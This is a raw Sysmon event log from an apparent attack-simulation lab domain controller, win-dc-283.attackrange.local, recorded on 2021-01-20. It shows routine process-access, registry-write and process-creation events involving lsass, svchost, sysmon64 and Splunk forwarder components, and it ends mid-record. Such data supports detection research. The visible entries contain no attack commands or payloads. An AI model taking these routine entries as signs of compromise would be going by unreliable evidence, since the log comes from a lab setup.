16:06:48.744{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:48.744{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:48.994{7901BC46-4985-6008-0B00-00000000A301}856912C:\Windows\system32\lsass.exe{7901BC46-4982-6008-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000030343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.931{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-552B-6008-DC06-00000000A301}7212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.931{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.931{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.931{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.931{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.931{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-552B-6008-DC06-00000000A301}7212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.931{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-552B-6008-DC06-00000000A301}7212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.932{7901BC46-552B-6008-DC06-00000000A301}7212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000030335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000030334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002d9cd1) 13241300x800000000000000030333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ef3d-0xeb05860a) 13241300x800000000000000030332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ef46-0x4cc9ee0a) 13241300x800000000000000030331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ef4e-0xae8e560a) 13241300x800000000000000030330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000030329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002d9cd1) 13241300x800000000000000030328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ef3d-0xeb05860a) 13241300x800000000000000030327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ef46-0x4cc9ee0a) 13241300x800000000000000030326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:07:07.634{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ef4e-0xae8e560a) 10341000x800000000000000030325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.260{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-552B-6008-DB06-00000000A301}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.260{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.260{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.260{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.260{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.260{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-552B-6008-DB06-00000000A301}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.260{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-552B-6008-DB06-00000000A301}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:07.260{7901BC46-552B-6008-DB06-00000000A301}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:08.744{7901BC46-552C-6008-DD06-00000000A301}68602948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:08.603{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-552C-6008-DD06-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:08.603{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:08.603{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:08.603{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 